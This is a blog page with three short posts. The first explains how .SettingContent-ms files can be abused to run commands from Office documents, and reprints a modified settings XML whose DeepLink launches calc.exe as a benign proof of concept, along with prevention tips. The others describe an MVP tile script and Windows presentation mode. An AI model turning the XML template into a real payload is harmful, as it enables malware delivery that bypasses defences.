New macro-less technique to distribute malware using .SettingsContent-ms

There's a new infection vector can be tapped into, one that circumvents the current protection settings and even Microsoft's new Attack Surface Reduction technology.

.SettingContent-ms file type is a format that was introduced in Windows 10 and allows a user to create shortcuts to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.

A modified ControlPanel.settingcontent-ms file to run calc.exe

<?xml version-"1.0" encoding-"UTF-8"?>
<PCSettings>
 <SearchableContent xmlns="http://schemas.microsoft. com/Search/2013/SettingContent">
  <ApplicationInformation>
   <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
   <DeepLink>cmd.exe /c calc.exe</DeepLink>
   <Icon>%windir%\system32\calc.exe</Icon>
  </ApplicationInformation>
  <SettingIdentity>
   <PageID></PageID>
   <HostID>{12B1697E-D3A0-4DBC-B568-CCF64A3F934D)</HostID>
  </SettingIdentity>
  <SettingInformation>
   <Description>@shel132.dll, -4161</Description>
   <Keywords>@shel132. dll, -4161</Keywords>
  </SettingInformation>
 </SearchableContent>
</PCSettings>

This feature can be abused because one of its elements (DeepLink) allows for any binary with parameters to be executed. All that an attacker needs to do is add his own command using Powershell.exe or Cmd.exe, as typical with most attacks.

By embedding a specially-crafted settings file into an Office document, an attacker can trick a user to run malicious code without any further warning or notification.

Embedded OLE .settingcontenct-ms object when click could trick user to open content

How to Prevent these Attacks

1) Use my simple hack to force Poweshell a UAC pop-up, allowing you to deny script launches.
2) https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 add to AVP 

Sources: 
1. https://blog.malwarebytes.com/threat-analysis/2018/07/new-macro-less-technique-used-distribute-malware/
2. https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39

Microsoft Most Valuable Professional (MVP) Metro Tile Creator 2018

In honor of winning an MVP award for 2018 and 5th year in a row, here's a freebie to fellow MVPers!!!  

I created a Powershell script to create a MVP Metro Tile to link to your choice of the following; 

1. Microsot MVP Award site (https://mvp.microsoft.com/)
2. Yammer (https://www.yammer.com/microsoftcommunityinfluencers/)
3. Enter your own blog URL where your MVP Award is displaying

Once you fill out form below, and you're enrollment confirmed, I send you the download.

  MVPMetroTileWin10.zip

Install

Read the contents of .ps1 file.

MVP Download Script Request Form for Microsoft MVPs only

Please send your MVP ID so you can be validated. Only MVPs are allowed this script.

Name
Email *
Message *
Connect with me on Yammer - Ask for "WINDOWS 10 MVP Metro Tile Powershell Script.zip". OR Send me a linked-in request - www.linkedin.com/in/markpahulje/ and I'll confirm if you are an MVP recipient, if it's listed on your profile.

Giving a presentation use Windows Presentation mode in Windows 10

How to use Windows Presentation mode in Windows 10

Ever need to prevent your computer from going to sleeping while do a presentation. Well this built-in windows tool is for you. 

While Windows Presentation mode is enabled it does the following; 

• prevents laptop form going to sleep
• system notifications are turned off
• prevents screen saver from appearing 
• show a sponsors background image during presentation

Hit Win+R key, and type presentationsettings.exe

OR you can use my handy presentation shortcut tool, and get this in one click.

Background images are from %HOMEDRIVE%%HOMEPATH%\Pictures and  

images are from windows themes located here
C:\Windows\Web\...